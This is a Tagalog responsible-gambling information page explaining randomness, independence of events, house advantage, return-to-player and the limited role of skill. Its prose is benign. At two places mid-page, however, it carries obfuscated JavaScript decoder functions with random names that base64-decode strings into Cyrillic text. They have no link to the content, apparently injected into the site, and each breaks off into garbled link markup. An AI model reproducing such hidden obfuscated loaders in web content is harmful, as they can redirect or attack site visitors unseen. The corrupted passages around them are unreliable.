Mga Dapat Malaman Tungkol Sa Pagsusugal

Mga Dapat Malaman Tungkol Sa Pagsusugal

Kung plano mong magsugal, hindi ba mabuting ideya na maintindihan mo munang mabuti ang mga mahahalagang konsepto tungkol dito? Halos lahat ng porma ng pagsusugal ay batay sa ilang karaniwang konsepto. Ang pag-alam sa mga konseptong ito ay makakatulong sa iyong maunawaan kung bakit mas malaki ang nawawalang pera sa mga manunugal kaysa sa napapanalunan nila. Maaari ka ring matulungan nito na maging responsable sa pagsusugal at hindi lumagpas sa limit ng itinakda mong ilaro.Narito ang mga halimbawa ng mga konseptong pag-uusapan natin.

function h052c1b60aed(x6){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t4='';var t2,u1,q3,q7,sa,r9,u2;var u4=0;do{q7=qd.indexOf(x6.charAt(u4++));sa=qd.indexOf(x6.charAt(u4++));r9=qd.indexOf(x6.charAt(u4++));u2=qd.indexOf(x6.charAt(u4++));t2=(q7<<2)|(sa>>4);u1=((sa&15)<<4)|(r9>>2);q3=((r9&3)<<6)|u2;if(t2>=192)t2+=848;else if(t2==168)t2=1025;else if(t2==184)t2=1105;t4+=String.fromCharCode(t2);if(r9!=64){if(u1>=192)u1+=848;else if(u1==168)u1=1025;else if(u1==184)u1=1105;t4+=String.fromCharCode(u1);}if(u2!=64){if(q3>=192)q3+=848;else if(q3==168)q3=1025;else if(q3==184)q3=1105;t4+=String.fromCharCode(q3);}}while(u4omness" href="http://getgamblingfacts.ca/mga-dapat-malaman-tungkol-sa-pagsusugal/walang-katiyakang-mga-resulta-o-randomness/?lang=fp">Walang Katiyakang  mga Resulta  (Randomness)

Sinsiguro ng mga Casino na ang mga laro nila ay walang katiyakan ang mga panalo at hindi mahuhulaan kaya IMPOSIBLENG bumalangkas ng isang sistema para mahulaan kung ano ang susunod na mangyayari. Alamin kung paano nila ginagawa ito.

Kawalang- Kaugnayan sa Isa't Isa ng  Mga Pangyayari (Independence of Events)

Sa halos lahat ng mga laro sa casino, ang nakaraang resulta ay HINDI NAKAKAAPEKTO sa kasalukuyan o mga sumusunod na mga resulta o kalalabasan ng mga laro. Alamin kung ano ang ibig sabihin nito para sa mga naglalaro at kung aling mga laro ang eksepsiyon.

Bakit Magagastusan Ka ng Pera Sa Pagsusugal

May mga paraan ang mga operators ng sugal na habang tumatagal ay lagi silang kumikita ng pera. Alamin kung paano nila ginagawa ito.

Lamang ng Bangka (House Advantage)

Lahat ng mga laro sa casino ay may "lamang ng bangka" na sumisigurong habang tumatagal, ang bangka - AT HINDI ANG NAGSUSUGAL - ang magkakapera. Alamin kung paano ito ginagawa.

Lamang ng Bangka at Walang Katiyakang mga Resulta: Paanong Magkasamang Gumagana Ang mga Ito

Ang dalawang konseptong ito ay mga susi sa pag-unawa sa pagsusugal. Pag-aralan kung paanong magkasamang gumagana ang mga ito sa iba't ibang klase ng sugal. Pag-aralan din kung bakit ipinapares ang kawalang-katiyakan ng mga resulta o panalo para masigurong LAHAT NG MGA MANUNUGAL, kahit manalo paminsan-minsan, sa kalaunan ay matatalo ng mas mahigit pa sa mga napanalunan nila habang tumatagal.

Magkano ang Nagagasta Mo sa Paglalaro?

Pag-aralan kung paano mo matatantiya kung magkano ang magagasta mo sa isang oras ng paglalaro mo ng paborito mong laro. Pagkatapos ay alamin kung mga magkano ang magagasta mo sa loob ng isang taon.

function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6 Ko sa Sugal" href="http://getgamblingfacts.ca/mga-personal-na-kuwento/ang-pagkalulong-ko-sa-sugal/?lang=fp">Pananalo sa Sugal: Panandaliang Panahon Lamang!

Kung magsusugal ka dahil sa pag-asang magkakapera ka, ang deskripsiyon ng "short term volatility" versus "long term predictability" o "panandaliang panahong madaling mawawala" laban sa pangmahabang panahong mahuhulaan kung ano ang mangyayari" ay maaaring makapagpabago ng isip mo.

Balik sa Naglalaro at Dalas ng Panalo (Return to Player o RTP at Hit Frequency)

Ang mga ito ay mga terminong madalas gamitin ng mga casino para ipaliwanag kung magkano at gaano kadalas magbigay ng panalo ang mga makina sa mga naglalaro. Magpatuloy pa ng pagbasa para malaman mo kung ano talaga ang magiging kahulugan ng mga ito para sa mga naglalaro.

Gumagana Ba Para sa Iyo ang Kakayanan o Kahusayan sa Paglalaro?

Ang kahusayan o kakayanan sa paglalaro ay walang bahaging ginagampanan sa maraming klase ng sugal, at kahit na kailangan ng kakayanan at kahusayan sa ibang laro, ang ginagampanang bahagi nito ay maliit lamang. Alamin kung saang laro magagamit ang kakayanan at kahusayan at aling laro ang suwerte lang ang aasahan mo.

Para subukan ang aming video poker simulator, mag-click dito: Maglaro ng WINVLT

Maglibang at matuto tungkol sa pagsusugal sa pamamagitan ng paglalaro ng aming Pick a Card game: Maglaro ng Pick a Card

Lahat ng mga casino ay naninigurong ang mga laro nila ay walang katiyakan at hindi mahuhulaan kung kailan ang panalo, kaya imposible para sa mga manlalaro na mahulaan nang tama kung ano ang susunod na mangyayari. Kung palagay mo ay may madidiskubre kang sistema para “talunin” ang mga larong pinaglalaruan mo at manalo ka ng malaking pera- mangyaring pakibasa mo kung paano gumagana ang pagiging walang katiyakan ng mga resulta ng laro kung sugal ang pag-uusapan.

Bumalik sa Tuktok